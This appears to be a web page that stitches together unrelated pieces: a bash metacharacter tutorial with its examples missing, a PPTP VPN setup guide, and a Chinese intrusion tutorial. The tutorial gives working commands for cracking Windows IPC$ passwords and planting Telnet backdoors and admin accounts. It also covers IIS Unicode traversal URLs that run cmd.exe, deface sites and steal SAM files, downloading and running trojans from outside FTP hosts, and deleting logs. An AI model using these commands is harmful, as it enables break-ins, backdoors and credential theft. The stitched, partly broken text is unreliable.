To save you some keystrokes and to be able to refer easily to a group of files, the bash shell lets you use metacharacters. Anytime you need to refer to a file or directory, such as to list it, open it, or remove it, you can use metacharacters to match the files you want. Here are some useful metacharacters for matching filenames:

• * — This matches any number of characters.
• ? — This matches any one character.
• [...] — This matches any one of the characters between the brackets, which can
include a dash-separated range of letters or numbers.

Sample Examples:








Using file-redirection metacharacters
Commands receive data from standard input and send it to standard output. Standard input is normally user input from the keyboard, and standard output is normally displayed on the screen. Using pipes (described earlier), you can direct standard output from one command to the standard input of another. With files, you can use less than (<) and greater than (>) signs to direct data to and from files. Here are the file redirection characters:
• < — Direct the contents of a file as input to the command (because many commands take a file name as an option, the < key is not usually needed).
• > — Direct the output of a command to a file, overwriting any existing file.
• >> — Direct the output of a command to a file, adding the output to the end of the existing file.
Here are some examples of command lines where information is directed to and from files.









Managing background and foreground processes
If you are using Linux over a network or from a dumb terminal (a monitor that allows only text input with no GUI support), your shell may be all that you have. You may be used to a windowing environment where you have a lot of programs active at the same time so that you can switch among them as needed. This shell thing can seem pretty limited.


There are several ways to place an active program in the background. One mentioned earlier is to add an ampersand (&) to the end of a command line. Another way is to use the at command to run commands in a way in which they are not connected to the shell. (See Chapter 12 for more information about the at command.)
To stop a running command and put it in the background, press Ctrl+z. After the command is stopped, you can either bring it to the foreground to run (the fg command) or start it running in the background (the bg command).







How to setup a dedicated PPTP VPN Server at your home office or main office.

By: Onlyone
14 December 2011 at 21:31

(Purpose is to enable road warriors, telecommuters, iPhones or iPads to access servers and network resources behind a company firewall.
If this setup gets too complicated, use commercial grade dedicated server hosting )
Pros and Cons of setting up (and using) PPTP VPN:
Pros:
(1) PPTP VPN client comes native with all Windows XP and Vista, and  iPhone.
(2) PPTP VPN uses TCP port 1723 (plus some nasty called GRE 47 protocol). Port 1723 is a standard well-know port used by Microsoft PPTP VPN clients/servers, hence it is unlikely that this port is blocked by wire-line ISPs. (However, cellular and wireless operators cleverly mess up / block VPN traffic unless you pay them an extra monthly ransom fee to have the VPN traffic un-messed or unblocked).
(3) Software cost for a PPTP VPN server using  Linux is low. For example, Windows Server 2003 with 5 client-access has a price tag of US $999, Microsoft ISA Server 2004 has a street price of US $1975 (but of course these products comes with many, many more other features).
(4) Hardware cost is low - Linux can run happily on very low end hardware platforms.
Cons: 
(1) In developing countries and small towns where log cabins and garden sheds are plentiful, hotels may use old routers that allows zero or one PPTP VPN session per hotel. If your road warriors are in these locations, only zero or one user can use PPTP VPN at any given time. Reason: PPTP VPN uses the nasty GRE 47 routing protocol which does not work with old NAT routers. See this diagram.
(2) User authentication depends completely on password, hence the security of the network depends on users having good passwords. g
(3) A fact of life, the remote user will experience a performance hit, depends on the network conditions. g
Useful hint: For files that are on share network drives, grab the file from remote to local desktop, then do editing, then drag the edited file back to remote server.
 
   Caveats emptor: 
-Assuming you have an externally accessible IP address, some ISPs do not give out externally accessible IP address.
-Assuming that your ISP allows you to set up a server in your network.
-Depends on the type of firewall/router, the road warrior may or may not be able to access the Internet while VPN. See thiscombination.
-If you use an internal Linksys WRT54GL with DD-WRT-VPN firmware upgrade, behind a D-LINK main firewall, don't forget to port forward TCP 1723 (and Protocol 47 GRE which is done automatically by the D-LINK firmware) to the IP address of the internal Linksys box.
-If you VPN into your home/office network and still want "Internet access", consider OpenVPN (OpenVPN is NAT and router friendly), OpenVPN is slightly harder to setup. In addition, OpenVPN can be configured to operate as: (default, partial stealth) only the internal traffic goes home; or (full stealth) all traffic goes through home.
How to setup a Debian PPTP VPN Server:
(user reported that this also works for Ubuntu Linux) 
Server hardware: 

Intel Pentium 3 or Intel Pentium 4 or AMD CPU (500 MHz CPU), 64 Meg RAM, 20 G Hard disk.

 gPreferred hardware. g
Instead of building a Linux server, you can also use a Linksys WRT54GL or WRT54G V4, replace the Linksys firmware with DD-WRT-VPN version.
To be safe, you should first flash the DD-WRT-mini version first, then flash the DD-WRT-VPN version so you won't destroy your Linksys box.
The DD-WRT-VPN version has an excellent PPTP server which is easy to set up and works perfectly behind a D-LINK firewall. See thiscombination.
The PPTP Server is in the Administration Tab, Services Tab. Check the PPTP check box. Server IP is the IP address of the WRT54GL box itself.
CHAP secret field is in the form of  username * password *
e.g. alice * strong-password  *




Insert the Debian (netinst) install CD in the server, power up the server.Software for Debian:

Create a "Debian install CD" from a CD image file.
Download the file "debian-40r5-i386-CD-1.iso" (about  650 meg bytes) or
download the file "debian-40r5-xxxx-i386-netinst.iso"  (about 160 meg bytes) from
http://cdimage.debian.org/debian-cd/current/i386/iso-cd/
Create a CD from the iso image file using any suitable CD burning software.
Follow the prompts to install a standard system (not a desktop, not a workstation, not a server)
After the Debian operating system is installed, install the Microsoft-compatible PPTP VPN server as follows:
(pptpd is the PPTP VPN server, mc is Midnight Commander, an editor similar to "notepad")
aptitude install pptpd mc
Type ifconfig and inspect the "eth0" section to find out the IP address of your server [inet addr]
mc -e /etc/pptpd.conf 
  add two lines:
(Assuming that your internal network IP address is 10.5.1.xxx, geeks call this the 10.5.1.0/24 subnet).
(It is important to avoid using the 192.168.1.xxx subnet for your home because most hotels, Linksys boxes, Cisco boxes, TP-LINK and Trendnet default to 192.168.1.xxx   You cannot VPN from one 192.168.1.0/24 network into another 192.168.1.0/24 network)
localip 10.5.1.3  (this address should be your server's IP address, [inet addr] when you type ifconfig, see above )
remoteip   10.5.1.241-246
 
Above configuration assigns 6 IP addresses for 6 roaming users to VPN into your home/corporate network simultaneously, super geeks (geeks that have network knowledge over and above normal geeks) call this the 10.5.1.240/29 subnet (to intimidate other ordinary geeks), see this subnet chart for different subnets you can choose without having to find/ask a super geek. The first address in a block is called the "network address", the last number in a block is called the "broadcast address", to be an Internet purist, avoid assigning the network address or the broadcast address to any roaming users (the first and last address of any block in the subnet chart).
mc  -e   /etc/ppp/options find the line that says ms-dns, modify the IP addresses to suit your local environment.
These two IP addresses should be the IP addresses of the DNS servers provided to you by your ISP.
The following examples are the OpenDNS servers which anyone can use.
ms-dns  208.67.222.222
ms-dns  208.67.220.220
Create user accounts and passwords for roaming/telecommuting users to access your VPN server (use strong passwords for security)
mc  -e  /etc/ppp/chap-secrets
    e.g.
alice pptpd a-strong-password  *
bob pptpd another-strong-password  *
The trailing * means these users are allowed to come in from any IP address, if the telecommuter or branch office
has a static or fixed IP address and never roams, then you can replace the * with his/her fixed IP address (or IP address block) for added security.
You typically want to use a "static IP" address for VPN server behind firewall.
Change the Debian box from DHCP to static IP address:
mc -e  /etc/network/interfaces
find the line that says iface eth0 inet dhcp
change the above line to  iface eth0 inet static
add 4 lines below the iface eth0 inet static line, the actual addresses you use should be your own internal network environment.
    address 10.5.1.3
    netmask 255.255.255.0
    broadcast 10.5.1.255
    gateway 10.5.1.1
F2 to save the file, F10 to quit editing
mc -e /etc/resolv.conf
nameserver 216.21.128.22  (note: please use your ISP/cable/DSL company's DNS servers)
nameserver 216.21.129.22
F2 to save the file, F10 to quit editing.

reboot

One final tweak is to instruct the Linux kernel to "forward" VPN packets.
mc -e   /etc/sysctl.conf
fine the line that says:
#net.ipv4.conf.default.forwarding=1
delete the #save the file.
reboot
With older kernels, you may need to add these (depreciated) steps:
touch   /etc/init.d/pptp
chmod 755  /etc/init.d/pptp
mc  -e  /etc/init.d/pptp
   edit the file, add one line, save the file.
echo 1 > /proc/sys/net/ipv4/ip_forward
cd   /etc/rcS.d
ln  -s   /etc/init.d/pptp   S85-pptp-packet-forward
reboot

If the PPTP VPN server is behind a D-LINK router/firewall, configure your D-LINK router/firewall to forward (or allow) TCP port 1723to the PPTP VPN server. You can find out what IP address the VPN server is using, simply type ifconfig and inspect the "eth0" section.
You also need to forward protocol GRE 47 to the PPTP server, D-Link routers will do this automatically for you when you forward TCP port 1723 to an internal IP address.
 g
Linksys WRT54G V4 with factory firmware (or DD-WRT firmware) cannot forward GRE 47 protocol from WAN-to-LAN, hence you cannot use a PPTP VPN server behind such router/firewall. But if you use a WRT54GL with DD-WRT-VPN firmware upgrade, you can use the same box to do firewall and PPTP VPN at the main entry point. Other combinations that might work are shown in this combination chartg  Disclaimer

gg
On the roaming or telecommuter  XP or g Vista laptop (or iPhone iPad), create a VPN network connection icon.
Start ... Connect To ... Show All ....Create New Connection ... connect to the network at my workplace...
Virtual Private Network connection 
... Company is myHQ ... Do not dial the initial connection ...
Hostname or IP address is your externally accessible IP address ... add a shortcut to desktop

To establish a VPN connection from hotels or telecommuting offices:

Double click the desktop VPN icon, enter username and password.
 You are now VPN'ed to your home office or corporate office! This has the effect of moving the roaming user into the home/office.Click here
 You can access your home/corporate email servers and other TCP-based services (such as print servers, VNC servers, etc) almost exactly as if you were sitting at home/office, except perhaps much slower. The PPTP VPN is a tunnel which encrypts the data trafficwhile traveling over a public network.
Caveats: You might not be able to do full Windows Network Browsing. There is a work around. Click here.
 Your home/corporate network IP address range (geeks call subnet) should be different than that of hotel/telecommuter, e.g., in above example, it might not work if the hotel or telecommuter also uses IP addresses 192.168.1.xxx.  Note that 192.168.1.xxx is the default IP subnet used by the popular Linksys WRT54G routers. In other words, if your home/corporate network is 192.168.1.xxx, then the road warriors will complain for sure because most hotels are also using 192.168.1.xxx, in that case, you need to change your home/office network to 10.x.x.x, which is a rather painful exercise.
Maintenance.
Periodically issue two commands to keep the system patched up to the latest security fixes. Click here.
Once you have a VPN server, you may want to increase your security by using  email security software
© 2007-2011 Nicholas Fong 

Revised September 27, 2011

Cracker 五法

By: Onlyone
14 December 2011 at 16:38
Cracker 五法

方法一:安装服务
  我知道很多人都有format 硬盘的坏习惯,我以前也有,现在彻底改邪归正了。如果找到一台有漏洞的机器(我这里专指可以拿到权限的win2K机器),由于没有开现成的端口,而轻易黑掉,是很可惜的。他没有开,我们可以给他开嘛。
  对于win2000,很多人进去都喜欢net start TermService,一般由于该服务被禁用,是开启不成功的,那么我们想一点别的办法。:)
  我们会用Windows 2000下的Resource Kits中的一个工具instsrv创建一个服务,instsrv的用法如下,当然,你也可以用其他的工具来实现(如srvinstw,GUI方式的)。
C:\>instsrv
Installs and removes system services from NT
INSTSRV <service name> (<exe location> | REMOVE)
[-a <Account Name>] [-p <Account Password>]
Install service example:
INSTSRV MyService C:\MyDir\DiskService.Exe
-OR-
INSTSRV MyService C:\mailsrv\mailsrv.exe -a MYDOMAIN\joebob -p foo
Remove service example:
INSTSRV MyService REMOVE
  大家现在明白了吧?
  先instsrv TermService REMOVE然后给他再装上终端服务instsrv Winlogonservice c:\winnt\system32\termsrv.exe
  嘿嘿,只要c:\winnt\system32\termsrv.exe存在,就可以给他装上一个叫做Winlogonservice的服务,而且是自动启动,哈哈~~
  不妨在送个reboot.exe给他,然后用at \\xxx.xxx.xxx.xxx 23:30 reboot.exe
这样他重启过后我们就能连接他的3389了。:)
方法二:对于终端服务设置为已禁止的机器
  使用win2000无人职守工具sysocmgr.exe:
echo [Components] > c:\bootlog.txt
echo TSEnabled = on >> c:\bootlog.txt
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\bootlog.txt /q
  sysocmgr的用法请自己到命令行下输入 sysocmgr[回车] 看看帮助,写得很清楚,上面的参数大致不变;如果你不想对方马上重启,输入 /r 选项,拟制重启(防止被发现):
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\bootlog.txt /q /r
方法三:修改对方服务设置或者直接修改注册表(成功率相对较低)
  1、在regedit中菜单“注册表”-》“连接网络注册表”HKEY_LOCAL_MACHINE-》SYSTEM-》CurrentControlSet-》Services-》Termservice,将start键值修改为2-》退出regedit
想办法让对方机器重启(reboot.exe很管用)
  2、我的电脑-》管理-》服务-》Terminal Services-》属性-》自动-》确定-》启动Terminal Services(成功率不是很高)
  进入肉鸡后,请大家帮助升级,打补丁,堵漏洞(肉鸡多半也是国内的嘛),然后她就会为你忠实服务了。
  对于sa弱密码进入系统的菜鸟,记得到 开始-》程序-》mssql server->enterprise management->。。。。-》security->logins里面给自己加个帐户(不要是DBO,会有麻烦),当然权限和sa相同,然后修改sa密码(嘿嘿,独占,这样“她的眼里只有你”)。
======== 续 =====
1)所谓“万能3389攻击”的具体攻击办法:
  3389连接目标的时候,点击服务器地址栏,点击任务栏输入法,选择清华紫光(或者别的什么鸟输入法,只要能看帮助就行);
  连接到3389服务器,如果对方刚好有这个输入法,那么就用输入法漏洞利用方法一样(差别是有的,关键在:找到什么地方有“打开文件”或者“保存文件”对话框出现);
2)漏洞存在的原因及解决思路:
  鉴于第三方输入法都是系统及相关应用软件(SQL server 、IIS、补丁等)装好后才考虑的事情,这个帮助文件一般也不是放在%systemroot%\help下面,所以删除这个目录下面的win*是没有用的,必须到安装目录去删除.cnt或者*.hlp文件才行。
  
  说得科学一点是这样:第三方软件设计缺陷导致系统出现漏洞;说得玄乎一点就是系统打不打补丁都一样能黑。由于第三方软件不在MS Service pack范围内,当然与sp 无关。
  听着这两种表示方式,大家觉得那样比较好? (我认为科学得态度是首要的,不要学李红痔故弄玄虚,把握事情本质才是我们追求的)
3)体验
  这是输入法漏洞利用的延伸,我曾经用清华紫光的这个帮助里面的“添加打印机”(好像是)然后弹出的”保存文件“对话框内,找个可执行文件,右键点击-》“建立快捷方式”-》快捷方式“属性”=》net user ......-》确定-》右键点击-》打开(也就是执行)成功进入过一些机器。
4)题外话
  另外,除非你运气特别好,否则比较难遇到,因为服务器上装东西的原则是:只要够用就行。
其实“口令入侵”这个主题网上有很多现成的教程,我在这里把它整理一下。不管是破解FTP口令还是TELNET口令,最终的目的都是为了取得系统控制权,成为administrators/root用户。对windows2000/NT来说,获得其管理员身份无非三种途径:一是得到SAM._文件,然后用10phtcrack之类的工具来暴力破解;二是用流光之类的工具对目标系统的简单IPC$、FTP密码、SQL密码等进行扫描探测;三是通过系统漏洞,绕过系统身份认证以管理员身份进去,然后添加一个administrators组的用户和密码。第一种方法需费很多时间,只要得到了SAM._文件,成功几率倒也不小;第二种方法只对那些粗心大意的网络管理员有用,譬如他将密码设置为1234,那用流光很快就能探测出来;第三种方法最为常见,寻找系统漏洞,然后尝试入侵,一直以来是网上入侵者们的兴趣所在,而且成功概率也高。对于UNIX/Linux系统,获取一个root权限要困难得多,通过查看一些资料,我发现这类入侵都遵循这么一个思路:1、扫描远程系统,试图发现漏洞,如rpc漏洞、FTP匿名登陆等。2、finger远程系统,尝试获得其用户列表。3、根据已获得资料试图得到远程系统的一个shell。这一步很重要,黑客的技术水平如何就体现在这里了,一些高明的黑客利用极其简单的一个系统弱点就能得到一个自己想要的shell。4、得到shell后,黑客就可以远程rsh或rlogin过去了,然后查看系统版本信息,根据已有的经验判断该版本系统可能存在的缓冲区溢出漏洞。5、查找系统可写入目录,并判断自己是否有可编译权限。6、当这一切完成后,黑客就上传一个溢出程序,在远程主机上编译并执行,从而利用溢出漏洞得到root权限。7、留下后门,清除日志

一、WINDOWS系统口令入侵
对于WIN2000/NT系统的口令入侵已讲得太多,我也不愿意将旧的故事一遍又一遍的重提。一般来说,这类入侵具体有这么几种手法:1、通过IPC$口令破解入侵;2、利用Unicode漏洞尝试入侵;3、利用开放终端服务和输入法漏洞入侵;4、利用IIS远程溢出漏洞入侵;5、利用SQL弱口令入侵。下面我简要介绍这5种入侵过程,看完后你会发现,原来进入远程系统是如此容易。
1、IPC$入侵:IPC$是指进程间的通信,win2000/NT主机之间通过它来实现数据交换。而利用这一特征还在于2000/NT系统有一个默认的隐藏共享,这个共享被设计的初衷是为了方便管理员远程管理操作系统的,现在却被黑客拿来实现他们的目的。
开启流光,选择“探测->扫描POP3/FTP/NT/SQL主机”,在“开始地址”和“结束地址”里都填入目标地址:192.168.4.95,在“扫描主机类型”下拉菜单里选择“NT/98”,点“确定”开始扫描。
经过几秒钟后,192.168.4.95 这台主机就出现在左边的主机类型“IPC$主机”里。选择这台主机,点击右键,在弹出的下拉菜单里选择“探测->探测IPC用户列表”。
开始探测,只要用户的密码字典里包含目标主机的密码,则流光迟早能探测出来,探测时间的长短取决于用户的密码字典大小和攻击机器的运行速度;典型的黑客字典都有十几兆大小,这样探测起来就需要很长(可能是几天)的时间。经过几分钟的探测后,我们发现,流光已成功的探测到了目标主机的三个密码,其中包括系统管理员Administrator密码:cell.
好了,有了目标主机的系统管理员密码后,这台主机就已经完全控制在我们手中了。下面说明如何利用流光探测到的密码从IPC$入侵主机.
开DOS窗口,先PING一下目标主机:192.168.4.95,看看TTL值为128,可以判定这台主机为NT/WIN2000系统了,正是我们所要。用如下命令:
c:\>net use \\192.168.4.95\ipc$ “cell” /user:”administrator”
提示:命令运行成功。已经成功的和目标主机建立连接。
复制一个Telnet程序上去(小榕流光安装目录下的Tools目录里的Srv.exe) ,这个程序是在目标系统上开一个Telnet服务,端口是99。
c:\>cd tools
c:\>tools>copy .\srv.exe \\192.168.4.95\admin$\system32
admin$是NT的默认的隐藏共享,他对应的是NT安装目录里的system32目录.通常是在c:\winnt\system32,你也可以用C$ , D$ 他们分别代表盘符C盘,D盘.都是系统的默认共享。
显示:已复制 1个文件。文件复制成功。
下面我们需要远程启动这项服务,利用WIN2000的SCHEDULE(定时)服务来启动这个程序。先看一下目标系统的时间:
c:\>net time \\192.168.4.95
显示:
\\192.168.4.95的当前时间是2001/10/22上午10:00
命令成功完成。
下面设定目标系统的TELNET服务在指定时间内启动,用at命令:
c:\>at \\192.168.4.95 10:02 srv.exe
显示:
新加了一项作业,作业ID=1。
说明命令成功执行,下一步就等到服务启动后TELNET上去。
2分钟后,可以TELNET了:
c:\>telnet 192.168.4.95 99
(srv.exe开的端口是99.这里我们就telnet 192.168.4.95 99)
这个程序好在不用输入口令和没有日志记录.但是每一次使用后都会自动关闭,下次要用时要重新启动,才能再用。
我们看到如下界面:
Microsoft Windows 2000 [version 5.00.2195]
<c>版权所有 1985-2000 Microsoft Corp.
C:\WINNT\system32\>
这样,我们就成功的登陆上去了。
由于我们已经是系统的管理员,所以有权在目标主机上做任何事,包括创建文件、删除文件、给文件该名、创建、删除用户帐号等。至此,目标系统再无任何安全可言。
当然,我们还可以以目标系统为跳板,进一步入侵别的系统。
另开一个DOS窗口,先复制TOOLS目录下的另一个文件NTLM.EXE上去:
c;\tools\>copy .\ntlm.exe \\192.168.4.95\admin$\system32
这个程序是用来改变WIN2000 TELNET SERVER 的身份验证方式,将其改为明文验证。
回到前一个DOS窗口,执行NTLM:
C:>ntlm
有提示字符显示命令成功完成。
然后我们重启一下TELNET 服务,用如下命令行:
c:\>net stop telnet
然后再:
c:\>net start telnet
提示:
TELNET 服务已经成功启动。
这样,你就可以以它为跳板,入侵别的主机了。
再次登陆本身:
C:\>telnet 192.168.4.95
要求输入用户名和口令。输入用户名administrator和 口令:cell,回车后登陆成功了。到此为止,我们已经完全取得了目标系统的控制权,一次入侵成功。
我们希望黑客到此为止就罢手了,可是他会罢手吗?不会。他还会在系统里留下几个后门,这样就算管理员密码被改了他也可以利用自己设置的后门进到系统。通常的,他会把系统guset帐号激活并加入管理员组,在TELNET终端下输入如下命令:
c:\>net user guest /active:yes
c:\>net user guest 1234
c:\>net localgroup administrators guest /add
这样他下次就可以用guset用户名,密码1234以系统管理员身份登陆了。
当然,不要忘了擦除痕迹,把c:\winnt\system32\logfiles\w3svc1\下的文件都给删了吧。
要防止这类入侵,第一是要将系统密码设置得复杂一些,不要使用生日和常用字符作为密码,而使用字母和数字的组合如lo3v4e之类的密码则普通的流光探测就无能为力了。第二是更改注册表,禁止建立空连接和禁止管理共享

2、Unicode漏洞入侵:
这类入侵在网上提得实在太多了,我也没心思写出更好的教材,下面转一篇:
首先我们来看看这个漏洞的原理。
在中文版的IIS4,和ISS5中,存在一个BUG,原因是UNICODE编码 存在BUG 在UNICODE 编码中,发现了一个奇怪的编码方式,
例如:
%c1%hh %c0%hh (0x00〈= 0xhh 〈 0x40)
IIS 把 "%c1%hh" 编码成
(0xc1 -0xc0) * 0x40 + 0xhh.
例如 (Windows 2000 + IIS 5.0 + SP1 简体中文版):
http://192.168.8.48/A.ida/%c1.ida
IIS 将返回"@.ida" 找不到该文件 在这里 (0xc1-0xc0)*0x40+0x00=0x40='@'
http://192.168.8.48/A.ida/%c1%01.ida
IIS 将返回 "A.ida" 找不到该文件 这里 (0xc1-0xc0)*0x40+0x01=0x41='A'
http://192.168.8.48/A.ida/%c1%02.ida
IIS 将返回 "B.ida" 找不到该文件 ....
http://192.168.8.48/A.ida/%c0%21.ida
IIS 将返回 "!.ida" 找不到该文件
这就意味着你能利用这些编码的特点。
例如:
%c1%1c -〉 (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = '/'
%c0%2f -〉 (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = '\'
所以我们就可以用这种方法进入一些目录。
(1)http://192.168.8.48/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
这样我们将得到
Directory of d:\inetpub\scripts
2000-09-28 15:49 〈DIR〉
.   1999-07-21 17:49 147,456
Count.exe 2000-09-12 17:08 438,290
Count25.exe 2000-10-13 15:03 8,867
counter.err 2000-08-23 23:07 160,002
counter.exe 1999-05-25 18:14 3,925
CountNT.html 1999-07-21 17:49 64,512
extdgts.exe 2000-08-10 15:24 46,352
ism.dll 1999-07-21 17:49 64,512
mkstrip.exe 1999-05-25 18:18 1,317
README.txt 2000-09-28 15:49
〈DIR〉 wcount 9 File(s) 935,233 bytes
(2) 我们也可以利用此BUG得到一些系统文件的内容
http://192.168.8.48/a.asp/..%c1%1c../..%c1..../winnt/win.ini
IIS 将把它当作 a .ASP 文件提交.它将让 asp.dll 来打开文件win.ini
如果用 IIS 4.0+SP6(中文版), 将不能测试成功 但是我们能用下列方法得到。http://192.168.8.100/default.asp/a.exe/.. ../.. ../winnt/winnt.ini
"default.asp" 是一个存在的 .ASP 文件, "a.exe" 是一个随机的 .EXE 文件名. 它可以不存在。
打上SP1仍然还有这种编码问题。
在英文版本中使用 %c1%af 能正常利用这个漏洞。
2.了解了漏洞的详细资料。让我们来说说怎么利用。
a.利用IISExploitSearcher工作之便这个软件,我们来找有这个漏洞的主机。
虽然这个漏洞公布很久了, 但你仍然会发现,你可以找到很多这种机器。
假如我们已经找到了一台有这个漏洞的机器。
让我们来进行下面的操作。
b.http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+ccc.exe
这个URL语句的执行的命令是:利用NT/2000下的命令解释程序cmd.exe来执行一个拷贝命令。
copy c:\winnt\system32\cmd.exe ccc.exe
它把c:\winnt\system32\cmd.exe 拷贝到了c:\inetpub\scripts\ccc.exe
就是DOS命令中的空格,在URL中就要换成“+”号。
你要执行copy c:\winnt\system32\cmd.exe ccc.exe
相对应的是http://ip/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+ccc.exe
其中/scripts/..%c1%1c../winnt/system32/cmd.exe?/c是固定的,他的作用是调用c:\winnt\system32\cmd.exe来执行命令。
噢,忘了说为什么要拷贝cmd.exe了。
因为微软的iis加载程序的时候检测到有串cmd.exe的话就要检测特殊字符“&|(,;%<>”,所以必须改名。
c.这时c:\winnt\system32\cmd.exe已经拷贝到了c:\inetpub\scripts\ccc.exe
通过http://ip/scripts/ccc.exe?/c
我们就可以调用到cmd.exe了,就是说不用那个编码了。
+c:\inetpub\wwwroot\default.asp">http://ip/scripts/ccc.exe?/c+echo+Hacked+by+Lion+>+c:\inetpub\wwwroot\default.asp
>+c:\inetpub\wwwroot\default.asp">http://192.168.8.48/scripts/ccc.exe?/c+echo+20/10/2000+>>+c:\inetpub\wwwroot\default.asp
主页面就被修改成了:
Hacked by Lion
20/10/2000
也就是说,已经把他的主页黑了。
:P
下面是一些解释。
其中echo 是一个回显命令。
你在DOS下打一个echo Hacked by Lion 看看。
它是在屏幕上显示
Hacked by Lion
不只这样
你也可以让它把东西写进一个文件。
echo Hacked by Lion > lion.txt
这样当前目录下的lion.txt文件里就有了Hacked by Lion的字样。
其中 > lion.txt的用途是把回显的字符写进lion.txt,它覆盖原来的内容。
你如果再想用echo 20/10/2000 > lion.txt 来写剩下的内容的话,
你会发现它覆盖了原来的内容Hacked by Lion。
怎么办呢?别急!
echo Hacked by Lion > lion.txt
echo 20/10/2000 >> lion.txt
看看吧
文件里面的是
Hacked by Lion
20/10/2000
成功了。
这样,就可以用上面的解释,把空格用"+"代替,就可以向别人的主页写任何东西了。
补充一点
好多站点\inetpub\下的scripts目录删除了, 但\Program Files\Common Files\System\下 的msadc还在
(有msadcs.dll漏洞的话就不用 %c1%1c了)。
这时可以如下构造请求:
http://ip/msadc/..%c1%1c../..%c1%1c../..%c.../c+dir+c:\
就能调用到cmd.exe
3.当然,我们也不能只停留在黑主页的地步,当然想进一步控制整个机器了。
:P
下面来说说几种方法来控制这个机器。
a. 如果c:\winnt\repair\sam._存在
那么我们把copy c:\winnt\repair\sam._ c:\inetpub\wwwroot\
然后用浏览器下载,用破NT密码的工具,比如l0phtcrack来破。
b.上载文件
1.找一个ftp服务器,将须上载的文件copy 到ftp服务器上,
假设这个 ftp server的 ip:127.1.1.1 ,username:abc,password:bbb 文件名:srv.exe
2.编辑一个上载执行文件
+up.txt">http://ip/scripts/ccc.exe?/c+echo+open+home4u.china.com>+up.txt
>+up.txt">http://ip/scripts/ccc.exe?/c+echo+pppppppppp>>+up.txt (>>号前不要有空格)
>+up.txt">http://ip/scripts/ccc.exe?/c+echo+pppppppppp>>+up.txt
http://ip/scripts/ccc.exe?/c+echo+get srv.exe>>+up.txt
>+up.txt">http://ip/scripts/ccc.exe?/c+echo+quit>>+up.txt
http://ip/scripts/ccc.exe?/c+tp+-s:up.txt
如果你看不懂上面的命令。
你在DOS下打一个ftp /?看看。
:P
成功率很高的哦。
3.然后http://ip/scripts/srv.exe运行它。
srv.exe是我放的一个冰河服务端。
下面不用我说了吧。
用冰河客户端连接他就可以了。
:P
顺便说一下
冰河的公用密码是:
05181977
他有70%左右的成功率。
subseven的共用密码是:
abuse
4.当然你也可以给他中一个nc99.exe等的东西。
获取administrator权限
上载getadmin.exe
getadmin iusr_机器名
这一招不一定有效哦。
http:/ip/scripts/ccc.exe?/c+net+user+aaa+12345+/add
http:/ip/scripts/ccc.exe?/c+net+localgroup+administrators+aaa+/add
c. 当然我们也有其他方法来上传文件。
前一段时间黑了几个台湾网站,net use也练得比较熟了。
看到有一个类似的教程用net use。
我也试了一下,累试不爽。呵呵
找个中转站,利用net use来上传文件。
我们要用到legion。
legion是一个扫描共享的软件。
你通过用它,你会找到一大堆的蠢伙。把整个C.D盘共享,并且不用密码的。
当然,设置密码也是没用的。呵呵猜26个字母就搞掂了。当然这要用另外一个软件。:P,在这就不说了。
找到后C盘或D盘后,
net use g: \\x.x.x.x\d
把他的d映射成你的g:盘。
现在我们来把东西拷贝到他的D盘,也就是你的G盘。
copy e:\tools\srv.exe \
拷贝一个文件,随便你哦。:P
你也可以在我的电脑里把它拖过去就可以了。:P
操作完成就不管他了。
让我们来回到服务器上操作。
1http://x.x.x.x/scripts/ccc.exe?/c+net+use+g:+\\10.1.1.1\d
建立连接和映射。
这个过程时间可能会长一点,耐心等等。
2http://x.x.x.x/scripts/ccc.exe?/c+dir+g :
看看东西在不在哦:P
3http://x.x.x.x/scripts/ccc.exe?/c+g:\srv.exe
直接运行就可以了。
:P
又一个中了木马。
但我不能保证它能100%成功哦。
d.用TFTP上传文件。
但具体怎么用我没试过。:(
谁知道的写信告诉我。
近来安全类技术网站提得最多的技术漏洞莫过于 %c1%1c 的问题。
%c1%1c,中文简体里面没有这种字,照正常的情况根据内码转换文件
\winnt\system32\c_936.nls会编码成“?”。但对中文简体版IIS中
c1 1c解码成了(c1-c0)*40+1c=5c=“\”。此编码发生在IIS检测处理路
径串中的“..\”之后,所以可以突破IIS路径访问到上级目录。此漏洞
从中文IIS4.0+SP6开始,还影响中文WIN2000+IIS5.0、中文WIN2000+IIS5.0
+SP1,好像台湾繁体中文也受此漏洞影响。
执行:http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32
/cmd.exe?/c+dir%20c:\发现列出了远程主机C:\下的所有文件,执行:http://xxx.xxx.xxx.xxx/scripts/.. ../winnt/system32/cmd.exe?/c
+copy%20c:\autoexec.bat%20c:\autoexec.bak 成功实现文件的复制,
执行:http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/
cmd.exe?/c+del%20c:\autoexec.bak 成功实现文件的删除,哇!太利害了。
随便浏览了一下,因为是国内的主机,不想搞破坏,只想练练手!目的:
获得Administrator权限。
执行:http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/
cmd.exe?/c+copy%20c:\winnt\repair\sam._%20c:\inetpub\wwwroot\
把sam._文件拷贝到wwwroot文件内,输入:http://xxx.xxx.xxx.xxx/sam._
将sam._文件下载到本地,执行:http://xxx.xxx.xxx.xxx/scripts/.. ../winnt/system32/cmd.exe?/c
+del%20c:\inetpub\wwwroot\sam._清除痕迹。
在本机执行:C:>expand sam._ sam
启动l0phtcrack 2.5(可到http://rina.yofor.com/7index.html 下载),Import Sam File... 导入sam文件,Open Wordlist File...
打开一个字典,Run Crack,乖乖,要17个小时,不管它,让它慢慢破去,先睡个
觉先!五分钟后来一看,Administrator 的 Nt Password 居然是 123456,我昏,
网管们注意了,这种密码也可以取呀?执行:C:\>newletmein \\xxx.xxx.xxx -admin
扫描主机,发现管理员ID是:asdfghjk,执行:C:\>net use \\xxx.xxx.xxx.xxxc$
123456 /user:asdfghjk 成功联上对方主机,大功告成!
文中提及的FTP上传现在不太用了,都改用TFTP上传。我简要说一下TFTP的使用方法:
首先使自己的系统配置成为TFTP服务器。这个很好办,下载一个TFTP服务器在本机运行起来。然后在存在U漏洞的目标主机浏览器里输入:
http://192.168.4.95/scripts/..%c1%1c../win...2;\srv.exe
